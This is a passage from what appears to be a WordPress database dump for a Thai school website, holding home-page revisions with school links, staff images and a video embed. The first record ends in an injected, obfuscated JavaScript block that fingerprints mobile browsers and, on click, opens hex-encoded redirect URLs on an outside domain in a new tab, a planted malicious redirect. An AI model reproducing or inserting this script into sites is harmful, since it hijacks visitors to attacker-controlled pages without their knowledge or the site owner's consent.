g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 14:48:06','2025-06-27 07:48:06','',19,'http://watprato.ssk.in.th/?p=568',0,'revision','',0),
(569,1,'2025-06-27 14:51:19','2025-06-27 07:51:19','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 